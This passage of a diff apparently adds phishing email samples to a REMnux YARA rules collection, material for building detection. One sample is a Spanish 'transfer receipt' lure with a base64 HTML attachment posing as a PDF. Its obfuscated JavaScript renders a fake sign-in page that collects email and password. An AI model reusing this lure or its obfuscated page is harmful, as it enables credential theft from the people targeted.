+                      sometido a programas antivirus. No obstante, el BANCO DAVIVIENDA 
+                      S.A. y sus FILIALES no asumen ninguna responsabilidad por eventuales da�os generados 
+                      por el recibo y el uso de este material, siendo responsabilidad 
+                      del destinatario verificar con sus propios medios la existencia 
+                      de virus u otros defectos. El presente correo electr�nico 
+                      solo refleja la opini�n de su Remitente y no representa 
+                      necesariamente la opini�n oficial del BANCO DAVIVIENDA S.A. 
+                      y sus FILIALES o de sus Directivos.</font></div>
+                  </td>
+                </tr>
+              </table>
+              <p><br>
+              </p>
+            </div>
+          </div> </div> 
+      </div> </div> </div></div>
+</html>
diff -Nru remnux-rules-0.0.3/yara/email/eml/transferencia1.eml remnux-rules-0.0.4/yara/email/eml/transferencia1.eml
--- remnux-rules-0.0.3/yara/email/eml/transferencia1.eml	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/email/eml/transferencia1.eml	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,3015 @@
+De: Santiago Honrubia <XXX@YYY.com>
+Fecha: 26 de diciembre de 2015, 20:25
+Asunto: Justificante de transferencia
+Para:
+
+
+Hola,
+
+Adjunto justificante de transferencia
+
+Gracias,
+Jorge Garc=C3=ADa
+
+Este e-mail contiene informaci=C3=B3n propietaria, el contenido de la cual =
+puede
+estar legalmente protegido. Si usted no es el destinatario previsto, no lo
+puede usar, divulgar, distribuir, copiar o imprimir. Este mensaje
+electr=C3=B3nico est=C3=A1 dirigido =C3=BAnicamente a la(s) direcci=C3=B3n(=
+es) indicadas
+anteriormente; el car=C3=A1cter confidencial, personal e intransferible del
+misto est=C3=A1 protegido legalmente. Cualquier revelaci=C3=B3n, uso o reen=
+vi=C3=B3 no
+autorizado, total o en parte, estar=C3=A1 prohibido. Si ha recibido este me=
+nsaje
+por error, notif=C3=ADquelo de inmediato a la persona que lo ha enviado y b=
+orre
+el mensaje original juntamente con los ficheros anexos sin leerlo ni
+grabarlo total o parcialmente. Gracias.
+
+--001a114080ea5c79e6052a51c167
+Content-Type: text/html; charset=US-ASCII; name="scan001.pdf.html"
+Content-Disposition: attachment; filename="scan001.pdf.html"
+Content-Transfer-Encoding: base64
+X-Attachment-Id: f_iinhycpc0
+
+PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Ml
+MjElNDQlNEYlNDMlNTQlNTklNTAlNDUlMjAlNjglNzQlNkQlNkMlM0UlMEElM0MlNjglNzQlNkQl
+NkMlMjAlNzglNkQlNkMlNkUlNzMlM0QlMjIlNjglNzQlNzQlNzAlM0ElMkYlMkYlNzclNzclNzcl
+MkUlNzclMzMlMkUlNkYlNzIlNjclMkYlMzElMzklMzklMzklMkYlNzglNjglNzQlNkQlNkMlMjIl
+M0UlM0MlNjglNjUlNjElNjQlM0UlMEElM0MlNkQlNjUlNzQlNjElMjAlNkUlNjElNkQlNjUlM0Ql
+MjIlNzIlNkYlNjIlNkYlNzQlNzMlMjIlMjAlNjMlNkYlNkUlNzQlNjUlNkUlNzQlM0QlMjIlNkUl
+NkYlNjklNkUlNjQlNjUlNzglMkMlMjAlNkUlNkYlNjYlNkYlNkMlNkMlNkYlNzclMjIlM0UlMEEl
+M0MlNkQlNjUlNzQlNjElMjAlNkUlNjElNkQlNjUlM0QlMjIlNjclNkYlNkYlNjclNkMlNjUlNjIl
+NkYlNzQlMjIlMjAlNjMlNkYlNkUlNzQlNjUlNkUlNzQlM0QlMjIlNkUlNkYlNjklNkUlNjQlNjUl
+NzglMkMlMjAlNkUlNkYlNjYlNkYlNkMlNkMlNkYlNzclMkMlMjAlNkUlNkYlNjElNzIlNjMlNjgl
+NjklNzYlNjUlMkMlMjAlNkUlNkYlNzMlNkUlNjklNzAlNzAlNjUlNzQlMkMlMjAlNkUlNkYlNkYl
+NjQlNzAlMjIlM0UlMEElMjAlMjAlM0MlNzQlNjklNzQlNkMlNjUlM0UlNTMlNjklNjclNkUlMjAl
+NDklNkUlM0MlMkYlNzQlNjklNzQlNkMlNjUlM0UlMEElMjAlMjAlM0MlNzMlNjMlNzIlNjklNzAl
+NzQlM0UlMEElMjAlMjAlMjAlMjAlNjYlNzUlNkUlNjMlNzQlNjklNkYlNkUlMjAlNzMlNjklNjcl
+NkUlNEYlNkUlMjglMjklMjAlN0IlMEElMEElMDklMDklNzUlMjAlM0QlMjAlNjQlNkYlNjMlNzUl
+NkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlM0IlMEEl
+MDklMDklNzAlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUl
+NzglMzIlMkUlNTAlNjElNzMlNzMlNzclNjQlM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMEElMDkl
+NjklNjYlMjglNzUlMkUlNzYlNjElNkMlNzUlNjUlMjAlM0QlM0QlMjIlMjIlMjklMEElMjAlMjAl
+MjAlMjAlMjAlMjAlMjAlMjAlN0IlMEElMDklMkYlMkYlNjElNkMlNjUlNzIlNzQlMjglMjIlNTAl
+NkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNjElMjAlNzYlNjElNkMlNjklNjQl
+MjAlNTUlNzMlNjUlNzIlMjAlNEUlNjElNkQlNjUlMjAlNjElNkUlNjQlMjAlNTAlNjElNzMlNzMl
+NzclNkYlNzIlNjQlMkUlMjIlMjklM0IlMEElMDklNjElNkMlNjUlNzIlNzQlMjglMjIlNTAlNkMl
+NjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNzklNkYlNzUlNzIlMjAlNDUlNkQlNjEl
+NjklNkMlMjAlNDklNDQlMjIlMjklM0IlMEElMDklNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUl
+NjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlMkUlNjYlNkYlNjMlNzUlNzMlMjgl
+MjklMjAlM0IlMjAlMEElMDklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNjYlNjElNkMlNzMlNjUlM0Il
+MEElMDklN0QlMEElMDklMEElMDklNjklNjYlMjglNzAlMkUlNzYlNjElNkMlNzUlNjUlMjAlM0Ql
+M0QlMjIlMjIlMjklMEElMDklMjAlN0IlMEElMDklMkYlMkYlNjElNkMlNjUlNzIlNzQlMjglMjIl
+NTAlNkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNjElMjAlNzYlNjElNkMlNjkl
+NjQlMjAlNTUlNzMlNjUlNzIlMjAlNEUlNjElNkQlNjUlMjAlNjElNkUlNjQlMjAlNTAlNjElNzMl
+NzMlNzclNkYlNzIlNjQlMkUlMjIlMjklM0IlMEElMDklNjElNkMlNjUlNzIlNzQlMjglMjIlNTAl
+NkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNzklNkYlNzUlNzIlMjAlNTAlNjEl
+NzMlNzMlNzclNkYlNzIlNjQlMjIlMjklM0IlMEElMDklMDklNjQlNkYlNjMlNzUlNkQlNjUlNkUl
+NzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNTAlNjElNzMlNzMlNzclNjQlMkUlNjYlNkYlNjMl
+NzUlNzMlMjglMjklMjAlM0IlMjAlMEElMDklNzIlNjUlNzQlNzUlNzIlNkUlMjAlNjYlNjElNkMl
+NzMlNjUlM0IlMEElMDklN0QlMEElMDklNzIlNjUlNzQlNzUlNzIlNkUlMjglMjAlNzQlNzIlNzUl
+NjUlMjAlMjklM0IlMEElN0QlMEElM0MlMkYlNzMlNjMlNzIlNjklNzAlNzQlM0UlMEElMEElM0Ml
+NzMlNzQlNzklNkMlNjUlM0UlMEElMjAlMjAlNjglNzQlNkQlNkMlMkMlMjAlNjIlNkYlNjQlNzkl
+MjAlN0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNjYlNjElNkQlNjklNkMlNzklM0ElMjAlNDEl
+NzIlNjklNjElNkMlMkMlMjAlNzMlNjElNkUlNzMlMkQlNzMlNjUlNzIlNjklNjYlM0IlMEElMjAl
+MjAlNjIlNjElNjMlNkIlNjclNzIlNkYlNzUlNkUlNjQlMkQlNjklNkQlNjElNjclNjUlM0ElNzUl
+NzIlNkMlMjglNjglNzQlNzQlNzAlM0ElMkYlMkYlNjMlNjQlNkUlMkUlNzQlNzIlNjklNzAlNzcl
+NjklNzIlNjUlNkQlNjElNjclNjElN0ElNjklNkUlNjUlMkUlNjMlNkYlNkQlMkYlNzclNzAlMkQl
+NjMlNkYlNkUlNzQlNjUlNkUlNzQlMkYlNzUlNzAlNkMlNkYlNjElNjQlNzMlMkYlMzIlMzAlMzEl
+MzMlMkYlMzAlMzElMkYlNzclNkYlNzIlNkMlNjQlMkQlNkQlNjElNzAlMkQlNjQlNkYlNzQlNzQl
+NjUlNjQlMkQlNzYlNjUlNjMlNzQlNkYlNzIlMkUlNzAlNkUlNjclMjklM0IlMEElMjAlNjIlNjEl
+NjMlNkIlNjclNzIlNkYlNzUlNkUlNjQlMkQlNzMlNjklN0ElNjUlM0ElMjAlMzElMzQlMzAlMzAl
+NzAlNzglMjAlMzclMzAlMzAlNzAlNzglM0IlMEElMjAlMjAlMjAlMjAlNjIlNjElNjMlNkIlNjcl
+NzIlNkYlNzUlNkUlNjQlMkQlNzIlNjUlNzAlNjUlNjElNzQlM0ElMjAlNkUlNkYlMkQlNzIlNjUl
+NzAlNjUlNjElNzQlM0IlMEElMDklNjIlNjElNjMlNkIlNjclNzIlNkYlNzUlNkUlNjQlMkQlNzAl
+NkYlNzMlNjklNzQlNjklNkYlNkUlM0ElNjMlNjUlNkUlNzQlNjUlNzIlMEElMjAlMjAlNkQlNjEl
+NzIlNjclNjklNkUlM0ElMjAlMzAlM0IlMEElMjAlMjAlNzAlNjElNjQlNjQlNjklNkUlNjclM0El
+MjAlMzAlM0IlMEElMjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlM0ElMjAlMzAlM0IlMEElMjAlMjAl
+NzAlNkYlNzMlNjklNzQlNjklNkYlNkUlM0ElMjAlNjElNjIlNzMlNkYlNkMlNzUlNzQlNjUlM0Il
+MEElMjAlMjAlNjglNjUlNjklNjclNjglNzQlM0ElMjAlMzElMzAlMzAlMjUlM0IlMEElMjAlMjAl
+NkQlNjklNkUlMkQlNzclNjklNjQlNzQlNjglM0ElMjAlMzElMzAlMzAlMjUlM0IlMEElMjAlMjAl
+NjYlNkYlNkUlNzQlMkQlNzMlNjklN0ElNjUlM0ElMjAlMzElMzMlNzAlNzglM0IlMEElMjAlMjAl
+NjMlNkYlNkMlNkYlNzIlM0ElMjAlMjMlMzklMzklMzklMzklMzklMzklM0IlMEElMjAlMjAlNjQl
+NjklNzIlNjUlNjMlNzQlNjklNkYlNkUlM0ElMjAlNkMlNzQlNzIlM0IlMEElMjAlMjAlMkQlNzcl
+NjUlNjIlNkIlNjklNzQlMkQlNzQlNjUlNzglNzQlMkQlNzMlNjklN0ElNjUlMkQlNjElNjQlNkEl
+NzUlNzMlNzQlM0ElMjAlNkUlNkYlNkUlNjUlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjIlNzUl
+NzQlNzQlNkYlNkUlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0Ql
+NjIlNzUlNzQlNzQlNkYlNkUlNUQlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzkl
+NzAlNjUlM0QlNzMlNzUlNjIlNkQlNjklNzQlNUQlMjAlN0IlMEElMjAlMjAlNjYlNkYlNkUlNzQl
+MkQlNjYlNjElNkQlNjklNkMlNzklM0ElMjAlNDElNzIlNjklNjElNkMlMkMlMjAlNzMlNjElNkUl
+NzMlMkQlNzMlNjUlNzIlNjklNjYlM0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNzMlNjklN0El
+NjUlM0ElMjAlMzElMzMlNzAlNzglM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjElMkMlMEElMjAl
+MjAlNjElM0ElNjglNkYlNzYlNjUlNzIlMkMlMEElMjAlMjAlNjElM0ElNzYlNjklNzMlNjklNzQl
+NjUlNjQlMjAlN0IlMEElMjAlMjAlNjMlNkYlNkMlNkYlNzIlM0ElMjAlMjMlNDUlMzUlNDElMzcl
+NDElMzUlM0IlMEElMjAlMjAlNjMlNzUlNzIlNzMlNkYlNzIlM0ElMjAlNzAlNkYlNjklNkUlNzQl
+NjUlNzIlM0IlMEElMjAlMjAlNzQlNjUlNzglNzQlMkQlNjQlNjUlNjMlNkYlNzIlNjElNzQlNjkl
+NkYlNkUlM0ElMjAlNkUlNkYlNkUlNjUlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjElM0ElNjgl
+NkYlNzYlNjUlNzIlMjAlN0IlMEElMjAlMjAlNzQlNjUlNzglNzQlMkQlNjQlNjUlNjMlNkYlNzIl
+NjElNzQlNjklNkYlNkUlM0ElMjAlNzUlNkUlNjQlNjUlNzIlNkMlNjklNkUlNjUlM0IlMEElMjAl
+MjAlN0QlMEElMjAlMjAlNjglMzElMjAlN0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNzMlNjkl
+N0ElNjUlM0ElMjAlMzIlMzAlNzAlNzglM0IlMEElMjAlMjAlNjMlNkYlNkMlNkYlNzIlM0ElMjAl
+MjMlMzIlMzYlMzIlMzYlMzIlMzYlM0IlMEElMjAlMjAlNkQlNjElNzIlNjclNjklNkUlM0ElMjAl
+MzAlMjAlMzAlMjAlMzElMzUlNzAlNzglM0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNzclNjUl
+NjklNjclNjglNzQlM0ElMjAlMzElMzAlMzAlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjglMzIl
+MjAlN0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNzMlNjklN0ElNjUlM0ElMjAlMzElMzQlNzAl
+NzglM0IlMEElMjAlMjAlNjMlNkYlNkMlNkYlNzIlM0ElMjAlMjMlMzIlMzYlMzIlMzYlMzIlMzYl
+M0IlMEElMjAlMjAlNkQlNjElNzIlNjclNjklNkUlM0ElMjAlMzAlMjAlMzAlMjAlMzElMzUlNzAl
+NzglM0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNzclNjUlNjklNjclNjglNzQlM0ElMjAlNkUl
+NkYlNzIlNkQlNjElNkMlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIl
+NzQlNzklNzAlNjUlM0QlNjUlNkQlNjElNjklNkMlNUQlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUl
+NzQlNUIlNzQlNzklNzAlNjUlM0QlNkUlNzUlNkQlNjIlNjUlNzIlNUQlMkMlMEElMjAlMjAlNjkl
+NkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzAlNjElNzMlNzMlNzclNkYlNzIlNjQlNUQl
+MkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzQlNjUlNkMlNUQl
+MkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzQlNjUlNzglNzQl
+NUQlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzUlNzIlNkMl
+NUQlMjAlN0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjElNzAlNzAlNjUlNjElNzIlNjElNkUl
+NjMlNjUlM0ElMjAlNkUlNkYlNkUlNjUlM0IlMEElMjAlMjAlMkQlNzclNjUlNjIlNkIlNjklNzQl
+MkQlNjElNzAlNzAlNjUlNjElNzIlNjElNkUlNjMlNjUlM0ElMjAlNkUlNkYlNkUlNjUlM0IlMEEl
+MjAlMjAlNjElNzAlNzAlNjUlNjElNzIlNjElNkUlNjMlNjUlM0ElMjAlNkUlNkYlNkUlNjUlM0Il
+MEElMjAlMjAlNjQlNjklNzMlNzAlNkMlNjElNzklM0ElMjAlNjklNkUlNkMlNjklNkUlNjUlMkQl
+NjIlNkMlNkYlNjMlNkIlM0IlMEElMjAlMjAlNjglNjUlNjklNjclNjglNzQlM0ElMjAlMzMlMzYl
+NzAlNzglM0IlMEElMjAlMjAlNzAlNjElNjQlNjQlNjklNkUlNjclM0ElMjAlMzAlMjAlMzglNzAl
+NzglM0IlMEElMjAlMjAlNkQlNjElNzIlNjclNjklNkUlM0ElMjAlMzAlM0IlMEElMjAlMjAlMEEl
+MjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlM0ElMjAlMzElNzAlNzglMjAlNzMlNkYlNkMlNjklNjQl
+MjAlMjMlNjQlMzklNjQlMzklNjQlMzklM0IlMEElMjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQl
+NzQlNkYlNzAlM0ElMjAlMzElNzAlNzglMjAlNzMlNkYlNkMlNjklNjQlMjAlMjMlNjMlMzAlNjMl
+MzAlNjMlMzAlM0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzglMkQlNzMlNjklN0El
+NjklNkUlNjclM0ElMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNjIlNkYlNzglM0IlMEElMjAlMjAl
+MkQlNzclNjUlNjIlNkIlNjklNzQlMkQlNjIlNkYlNzglMkQlNzMlNjklN0ElNjklNkUlNjclM0El
+MjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNjIlNkYlNzglM0IlMEElMjAlMjAlNjIlNkYlNzglMkQl
+NzMlNjklN0ElNjklNkUlNjclM0ElMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNjIlNkYlNzglM0Il
+MEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNzIlNjElNjQlNjkl
+NzUlNzMlM0ElMjAlMzElNzAlNzglM0IlMEElMjAlMjAlMkQlNzclNjUlNjIlNkIlNjklNzQlMkQl
+NjIlNkYlNzIlNjQlNjUlNzIlMkQlNzIlNjElNjQlNjklNzUlNzMlM0ElMjAlMzElNzAlNzglM0Il
+MEElMjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNzIlNjElNjQlNjklNzUlNzMlM0ElMjAlMzEl
+NzAlNzglM0IlMEElMjAlMjAlNjYlNkYlNkUlNzQlMkQlNzMlNjklN0ElNjUlM0ElMjAlMzElMzUl
+NzAlNzglM0IlMEElMjAlMjAlNjMlNkYlNkMlNkYlNzIlM0ElMjAlMjMlMzQlMzAlMzQlMzAlMzQl
+MzAlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUl
+M0QlNjUlNkQlNjElNjklNkMlNUQlM0ElNjglNkYlNzYlNjUlNzIlMkMlMEElMjAlMjAlNjklNkUl
+NzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNkUlNzUlNkQlNjIlNjUlNzIlNUQlM0ElNjglNkYl
+NzYlNjUlNzIlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzAl
+NjElNzMlNzMlNzclNkYlNzIlNjQlNUQlM0ElNjglNkYlNzYlNjUlNzIlMkMlMEElMjAlMjAlNjkl
+NkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzQlNjUlNkMlNUQlM0ElNjglNkYlNzYlNjUl
+NzIlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzQlNjUlNzgl
+NzQlNUQlM0ElNjglNkYlNzYlNjUlNzIlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQl
+NzklNzAlNjUlM0QlNzUlNzIlNkMlNUQlM0ElNjglNkYlNzYlNjUlNzIlMjAlN0IlMEElMjAlMjAl
+NjIlNkYlNzIlNjQlNjUlNzIlM0ElMjAlMzElNzAlNzglMjAlNzMlNkYlNkMlNjklNjQlMjAlMjMl
+NjIlMzklNjIlMzklNjIlMzklM0IlMEElMjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNzQlNkYl
+NzAlM0ElMjAlMzElNzAlNzglMjAlNzMlNkYlNkMlNjklNjQlMjAlMjMlNjElMzAlNjElMzAlNjEl
+MzAlM0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzglMkQlNzMlNjglNjElNjQlNkYl
+NzclM0ElMjAlNjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzElNzAlNzglMjAlMzIlNzAlNzglMjAl
+NzIlNjclNjIlNjElMjglMzAlMkMlMzAlMkMlMzAlMkMlMzAlMkUlMzElMjklM0IlMEElMjAlMjAl
+MkQlNzclNjUlNjIlNkIlNjklNzQlMkQlNjIlNkYlNzglMkQlNzMlNjglNjElNjQlNkYlNzclM0El
+MjAlNjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzElNzAlNzglMjAlMzIlNzAlNzglMjAlNzIlNjcl
+NjIlNjElMjglMzAlMkMlMzAlMkMlMzAlMkMlMzAlMkUlMzElMjklM0IlMEElMjAlMjAlNjIlNkYl
+NzglMkQlNzMlNjglNjElNjQlNkYlNzclM0ElMjAlNjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzEl
+NzAlNzglMjAlMzIlNzAlNzglMjAlNzIlNjclNjIlNjElMjglMzAlMkMlMzAlMkMlMzAlMkMlMzAl
+MkUlMzElMjklM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzkl
+NzAlNjUlM0QlNjUlNkQlNjElNjklNkMlNUQlM0ElNjYlNkYlNjMlNzUlNzMlMkMlMEElMjAlMjAl
+NjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNkUlNzUlNkQlNjIlNjUlNzIlNUQlM0El
+NjYlNkYlNjMlNzUlNzMlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUl
+M0QlNzAlNjElNzMlNzMlNzclNkYlNzIlNjQlNUQlM0ElNjYlNkYlNjMlNzUlNzMlMkMlMEElMjAl
+MjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzQlNjUlNkMlNUQlM0ElNjYlNkYl
+NjMlNzUlNzMlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzQl
+NjUlNzglNzQlNUQlM0ElNjYlNkYlNjMlNzUlNzMlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQl
+NUIlNzQlNzklNzAlNjUlM0QlNzUlNzIlNkMlNUQlM0ElNjYlNkYlNjMlNzUlNzMlMjAlN0IlMEEl
+MjAlMjAlNkYlNzUlNzQlNkMlNjklNkUlNjUlM0ElMjAlNkUlNkYlNkUlNjUlM0IlMEElMjAlMjAl
+NjIlNkYlNzIlNjQlNjUlNzIlM0ElMjAlMzElNzAlNzglMjAlNzMlNkYlNkMlNjklNjQlMjAlMjMl
+MzQlNjQlMzklMzAlNjYlNjUlM0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzglMkQl
+NzMlNjglNjElNjQlNkYlNzclM0ElMjAlNjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzElNzAlNzgl
+MjAlMzIlNzAlNzglMjAlNzIlNjclNjIlNjElMjglMzAlMkMlMzAlMkMlMzAlMkMlMzAlMkUlMzMl
+MjklM0IlMEElMjAlMjAlMkQlNzclNjUlNjIlNkIlNjklNzQlMkQlNjIlNkYlNzglMkQlNzMlNjgl
+NjElNjQlNkYlNzclM0ElMjAlNjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzElNzAlNzglMjAlMzIl
+NzAlNzglMjAlNzIlNjclNjIlNjElMjglMzAlMkMlMzAlMkMlMzAlMkMlMzAlMkUlMzMlMjklM0Il
+MEElMjAlMjAlNjIlNkYlNzglMkQlNzMlNjglNjElNjQlNkYlNzclM0ElMjAlNjklNkUlNzMlNjUl
+NzQlMjAlMzAlMjAlMzElNzAlNzglMjAlMzIlNzAlNzglMjAlNzIlNjclNjIlNjElMjglMzAlMkMl
+MzAlMkMlMzAlMkMlMzAlMkUlMzMlMjklM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjklNkUlNzAl
+NzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNjMlNjglNjUlNjMlNkIlNjIlNkYlNzglNUQlMkMlMEEl
+MjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzIlNjElNjQlNjklNkYlNUQl
+MjAlN0IlMEElMjAlMjAlMkQlNzclNjUlNjIlNkIlNjklNzQlMkQlNjElNzAlNzAlNjUlNjElNzIl
+NjElNkUlNjMlNjUlM0ElMjAlNkUlNkYlNkUlNjUlM0IlMEElMjAlMjAlNjQlNjklNzMlNzAlNkMl
+NjElNzklM0ElMjAlNjklNkUlNkMlNjklNkUlNjUlMkQlNjIlNkMlNkYlNjMlNkIlM0IlMEElMjAl
+MjAlNzclNjklNjQlNzQlNjglM0ElMjAlMzElMzMlNzAlNzglM0IlMEElMjAlMjAlNjglNjUlNjkl
+NjclNjglNzQlM0ElMjAlMzElMzMlNzAlNzglM0IlMEElMjAlMjAlNkQlNjElNzIlNjclNjklNkUl
+M0ElMjAlMzAlM0IlMEElMjAlMjAlNjMlNzUlNzIlNzMlNkYlNzIlM0ElMjAlNzAlNkYlNjklNkUl
+NzQlNjUlNzIlM0IlMEElMjAlMjAlNzYlNjUlNzIlNzQlNjklNjMlNjElNkMlMkQlNjElNkMlNjkl
+NjclNkUlM0ElMjAlNjIlNkYlNzQlNzQlNkYlNkQlM0IlMEElMjAlMEElMjAlMjAlNjIlNkYlNzIl
+NjQlNjUlNzIlM0ElMjAlMzElNzAlNzglMjAlNzMlNkYlNkMlNjklNjQlMjAlMjMlNjMlMzYlNjMl
+MzYlNjMlMzYlM0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzIlNjQlNjUlNzIlMkQl
+NzIlNjElNjQlNjklNzUlNzMlM0ElMjAlMzElNzAlNzglM0IlMEElMjAlMjAlMkQlNzclNjUlNjIl
+NkIlNjklNzQlMkQlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNzIlNjElNjQlNjklNzUlNzMlM0ElMjAl
+MzElNzAlNzglM0IlMEElMjAlMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNzIlNjElNjQlNjklNzUl
+NzMlM0ElMjAlMzElNzAlNzglM0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzglMkQl
+NzMlNjklN0ElNjklNkUlNjclM0ElMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNjIlNkYlNzglM0Il
+MEElMjAlMjAlMkQlNzclNjUlNjIlNkIlNjklNzQlMkQlNjIlNkYlNzglMkQlNzMlNjklN0ElNjkl
+NkUlNjclM0ElMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNjIlNkYlNzglM0IlMEElMjAlMjAlNjIl
+NkYlNzglMkQlNzMlNjklN0ElNjklNkUlNjclM0ElMjAlNjIlNkYlNzIlNjQlNjUlNzIlMkQlNjIl
+NkYlNzglM0IlMEElMjAlMjAlNzAlNkYlNzMlNjklNzQlNjklNkYlNkUlM0ElMjAlNzIlNjUlNkMl
+NjElNzQlNjklNzYlNjUlM0IlMEElMjAlMjAlN0QlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIl
+NzQlNzklNzAlNjUlM0QlNjMlNjglNjUlNjMlNkIlNjIlNkYlNzglNUQlM0ElNjElNjMlNzQlNjkl
+NzYlNjUlMkMlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNzIlNjEl
+NjQlNjklNkYlNUQlM0ElNjElNjMlNzQlNjklNzYlNjUlMjAlN0IlMEElMjAlMjAlNjIlNjElNjMl
+NkIlNjclNzIlNkYlNzUlNkUlNjQlM0ElMjAlMjMlNjUlNjIlNjUlNjIlNjUlNjIlM0IlMEElMjAl
+MjAlN0QlMEElMjAlMjAlNjklNkUlNzAlNzUlNzQlNUIlNzQlNzklNzAlNjUlM0QlNjMlNjglNjUl
+NjMlNkIlNjIlNkYlNzglNUQlM0ElNjglNkYlNzYlNjUlNzIlMjAlN0IlMEElMjAlMjAlNjIlNkYl
+NzIlNjQlNjUlNzIlMkQlNjMlNkYlNkMlNkYlNzIlM0ElMjAlMjMlNjMlMzYlNjMlMzYlNjMlMzYl
+M0IlMEElMjAlMjAlMkQlNkQlNkYlN0ElMkQlNjIlNkYlNzglMkQlNzMlNjglNjElNjQlNkYlNzcl
+M0ElMjAlNjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzElNzAlNzglMjAlMzIlNzAlNzglMjAlNzIl
+NjclNjIlNjElMjglMzAlMkMlMzAlMkMlMzAlMkMlMzAlMkUlMzElMjklM0IlMEElMjAlMjAlMkQl
+NzclNjUlNjIlNkIlNjklNzQlMkQlNjIlNkYlNzglMkQlNzMlNjglNjElNjQlNkYlNzclM0ElMjAl
+NjklNkUlNzMlNjUlNzQlMjAlMzAlMjAlMzElNzAlNzglMjAlMzIlNzAlNzglMjAlNzIlNjclNjIl
